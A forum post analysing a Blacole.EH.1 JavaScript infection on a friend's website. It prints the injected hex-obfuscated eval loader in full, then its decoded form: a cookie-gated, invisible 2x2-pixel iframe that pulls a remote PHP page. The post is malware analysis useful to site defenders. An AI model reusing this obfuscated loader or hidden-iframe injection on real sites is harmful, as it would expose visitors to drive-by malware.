Blacole.EH.1 virus on website: Javascript/PHP infection

Post by **^rooker** » Tue Sep 03, 2013 2:39 am

Recently, a friend of mine has discovered a Javascript infection on one of his website.
The virus' intrusion mechanism reminded me of the "Martuz" virus, I've dealt with before.

It seems to use stolen FTP connection credentials to upload the infected files to the website.
Just like Martuz' entry point, we currently also suspect the Windows client which was used to administer the website content to be the weak point.

This assumption is backed up by a knowledge-base entry on the Microsoft Security website about this virus (Blacole.EH.1 variant).

The virus' original javascript code-block is as follows:

Code: Select all

            w=window;
            z="dy";
            d=document;
            aq="0x";
            bv=(5-3-1);
            try{++(d.body)}catch(d21vd12v){vzs=false;
                try{}catch(wb){vzs=21;
                }if(1){f="17:5d:6c:65:5a:6b:60:66:65:17:6d:27:30:1f:20:17:72:4:1:17:6d:58:69:17:6a:
6b:58:6b:60:5a:34:1e:58:61:58:6f:1e:32:4:1:17:6d:58:69:17:5a:66:65:6b:69:
66:63:63:5c:69:34:1e:60:65:5b:5c:6f:25:67:5f:67:1e:32:4:1:17:6d:58:69:17:
6d:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:69:5c:58:6b:5c:3c:63:5c:64:5c:
65:6b:1f:1e:60:5d:69:58:64:5c:1e:20:32:4:1:4:1:17:6d:25:6a:69:5a:17:34:17:
1e:5f:6b:6b:67:31:26:26:6a:64:6e:24:58:6c:5d:71:6c:5e:6a:70:6a:6b:5c:64:5c:
25:5b:5c:26:5a:5e:60:24:59:60:65:26:41:4e:64:5f:4f:6f:3f:2e:25:67:5f:67:1e:
32:4:1:17:6d:25:6a:6b:70:63:5c:25:67:66:6a:60:6b:60:66:65:17:34:17:1e:58:59:
6a:66:63:6c:6b:5c:1e:32:4:1:17:6d:25:6a:6b:70:63:5c:25:5a:66:63:66:69:17:34:
17:1e:29:1e:32:4:1:17:6d:25:6a:6b:70:63:5c:25:5f:5c:60:5e:5f:6b:17:34:17:1e:
29:67:6f:1e:32:4:1:17:6d:25:6a:6b:70:63:5c:25:6e:60:5b:6b:5f:17:34:17:1e:29:
67:6f:1e:32:4:1:17:6d:25:6a:6b:70:63:5c:25:63:5c:5d:6b:17:34:17:1e:28:27:27:
27:29:1e:32:4:1:17:6d:25:6a:6b:70:63:5c:25:6b:66:67:17:34:17:1e:28:27:27:27:
29:1e:32:4:1:4:1:17:60:5d:17:1f:18:5b:66:5a:6c:64:5c:65:6b:25:5e:5c:6b:3c:63:
5c:64:5c:65:6b:39:70:40:5b:1f:1e:6d:1e:20:20:17:72:4:1:17:5b:66:5a:6c:64:5c:65:
6b:25:6e:69:60:6b:5c:1f:1e:33:67:17:60:5b:34:53:1e:6d:53:1e:17:5a:63:58:6a:6a:
34:53:1e:6d:27:30:53:1e:17:35:33:26:67:35:1e:20:32:4:1:17:5b:66:5a:6c:64:5c:65:
6b:25:5e:5c:6b:3c:63:5c:64:5c:65:6b:39:70:40:5b:1f:1e:6d:1e:20:25:58:67:67:5c:65:
5b:3a:5f:60:63:5b:1f:6d:20:32:4:1:17:74:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:4a:
5c:6b:3a:66:66:62:60:5c:1f:5a:66:66:62:60:5c:45:58:64:5c:23:5a:66:66:62:60:5c:4d:
58:63:6c:5c:23:65:3b:58:70:6a:23:67:58:6b:5f:20:17:72:4:1:17:6d:58:69:17:6b:66:
5b:58:70:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:6d:58:69:17:5c:6f:67:
60:69:5c:17:34:17:65:5c:6e:17:3b:58:6b:5c:1f:20:32:4:1:17:60:5d:17:1f:65:3b:58:
70:6a:34:34:65:6c:63:63:17:73:73:17:65:3b:58:70:6a:34:34:27:20:17:65:3b:58:70:
6a:34:28:32:4:1:17:5c:6f:67:60:69:5c:25:6a:5c:6b:4b:60:64:5c:1f:6b:66:5b:58:70:
25:5e:5c:6b:4b:60:64:5c:1f:20:17:22:17:2a:2d:27:27:27:27:27:21:29:2b:21:65:3b:
58:70:6a:20:32:4:1:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:17:34:17:5a:
66:66:62:60:5c:45:58:64:5c:22:19:34:19:22:5c:6a:5a:58:67:5c:1f:5a:66:66:62:60:
5c:4d:58:63:6c:5c:20:4:1:17:22:17:19:32:5c:6f:67:60:69:5c:6a:34:19:17:22:17:5c:
6f:67:60:69:5c:25:6b:66:3e:44:4b:4a:6b:69:60:65:5e:1f:20:17:22:17:1f:1f:67:58:6b:
5f:20:17:36:17:19:32:17:67:58:6b:5f:34:19:17:22:17:67:58:6b:5f:17:31:17:19:19:20:
32:4:1:74:4:1:5d:6c:65:5a:6b:60:66:65:17:3e:5c:6b:3a:66:66:62:60:5c:1f:17:65:58:
64:5c:17:20:17:72:4:1:17:6d:58:69:17:6a:6b:58:69:6b:17:34:17:5b:66:5a:6c:64:5c:
65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:65:58:64:5c:17:22:17:
19:34:19:17:20:32:4:1:17:6d:58:69:17:63:5c:65:17:34:17:6a:6b:58:69:6b:17:22:17:
65:58:64:5c:25:63:5c:65:5e:6b:5f:17:22:17:28:32:4:1:17:60:5d:17:1f:17:1f:17:18:6a:
6b:58:69:6b:17:20:17:1d:1d:4:1:17:1f:17:65:58:64:5c:17:18:34:17:5b:66:5a:6c:64:5c:
65:6b:25:5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:27:23:17:65:58:64:
5c:25:63:5c:65:5e:6b:5f:17:20:17:20:17:20:4:1:17:72:4:1:17:69:5c:6b:6c:69:65:17:65:
6c:63:63:32:4:1:17:74:4:1:17:60:5d:17:1f:17:6a:6b:58:69:6b:17:34:34:17:24:28:17:20:
17:69:5c:6b:6c:69:65:17:65:6c:63:63:32:4:1:17:6d:58:69:17:5c:65:5b:17:34:17:5b:66:
5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:60:65:5b:5c:6f:46:5d:1f:17:19:32:19:23:
17:63:5c:65:17:20:32:4:1:17:60:5d:17:1f:17:5c:65:5b:17:34:34:17:24:28:17:20:17:5c:
65:5b:17:34:17:5b:66:5a:6c:64:5c:65:6b:25:5a:66:66:62:60:5c:25:63:5c:65:5e:6b:5f:32:
4:1:17:69:5c:6b:6c:69:65:17:6c:65:5c:6a:5a:58:67:5c:1f:17:5b:66:5a:6c:64:5c:65:6b:25:
5a:66:66:62:60:5c:25:6a:6c:59:6a:6b:69:60:65:5e:1f:17:63:5c:65:23:17:5c:65:5b:17:20:
17:20:32:4:1:74:4:1:60:5d:17:1f:65:58:6d:60:5e:58:6b:66:69:25:5a:66:66:62:60:5c:3c:65:
58:59:63:5c:5b:20:4:1:72:4:1:60:5d:1f:3e:5c:6b:3a:66:66:62:60:5c:1f:1e:6d:60:6a:60:6b:
5c:5b:56:6c:68:1e:20:34:34:2c:2c:20:72:74:5c:63:6a:5c:72:4a:5c:6b:3a:66:66:62:60:5c:1f:
1e:6d:60:6a:60:6b:5c:5b:56:6c:68:1e:23:17:1e:2c:2c:1e:23:17:1e:28:1e:23:17:1e:26:1e:20:
32:4:1:4:1:6d:27:30:1f:20:32:4:1:74:4:1:74"[sp](":");
                }w=f;
                s=[];
                for(i=22-20-2; -i+1367!=0; i+=1){
                    j=i;
                    if((0x19==031))s+=String["fromCharCode"](eval(aq+w[1*j])+0xa-bv);
                }
                ht=eval;
                ht(s)
            }

NOTE: I had to break the hex-encoded string, because phpBB's "code"-block retains the original line-breaks, which makes it unreadable in a browser.

Obviously, the code is heavily obfuscated, and the long string in "f" is the actual, evil part of the code as hex-encoded javascript.
Thanks to user "JiminP" on reddit.com, who posted the unwrapping and interpretation of a similar code.

Following JiminP's approach, I replaced "ht(s)" with "console.log(s);" to output the generated code:

Code: Select all

function v09() {
    var static = 'ajax';
    var controller = 'index.php';
    var v = document.createElement('iframe');

    v.src = 'http://some_infected_url.de/cgi-bin/JWmhXxH7.php';
    v.style.position = 'absolute';
    v.style.color = '2';
    v.style.height = '2px';
    v.style.width = '2px';
    v.style.left = '10002';
    v.style.top = '10002';

    if (!document.getElementById('v')) {
        document.write('<p id=\'v\' class=\'v09\' ></p>');
        document.getElementById('v').appendChild(v);
    }
}

function SetCookie(cookieName, cookieValue, nDays, path) {
    var today = new Date();
    var expire = new Date();
    if (nDays == null || nDays == 0) nDays = 1;
    expire.setTime(today.getTime() + 3600000 * 24 * nDays);
    document.cookie = cookieName + "=" + escape(cookieValue) + ";expires=" + expire.toGMTString() + ((path) ? "; path=" + path : "");
}

function GetCookie(name) {
    var start = document.cookie.indexOf(name + "=");
    var len = start + name.length + 1;
    if ((!start) &&
        (name != document.cookie.substring(0, name.length))) {
        return null;
    }
    if (start == -1) return null;
    var end = document.cookie.indexOf(";", len);
    if (end == -1) end = document.cookie.length;
    return unescape(document.cookie.substring(len, end));
}
if (navigator.cookieEnabled) {
    if (GetCookie('visited_uq') == 55) {} else {
        SetCookie('visited_uq', '55', '1', '/');

        v09();
    }
}

My Javascript-Foo is a bit rusty, but if I interpret the evil code correctly, it checks if the "visited_uq" cookie is set to the value "55". If it is, nothing happens. If it's not (=running for the first time, or cookies deleted), it loads the URL in "v.src" in an <iframe>, at a remote corner, 2x2 pixels wide (=not visible).

It then appends a paragraph html-element to the output of the called PHP file:

Code: Select all

<p id='v' class='v09\ ></p>

Huh? Whatfor? Looks like cheap credits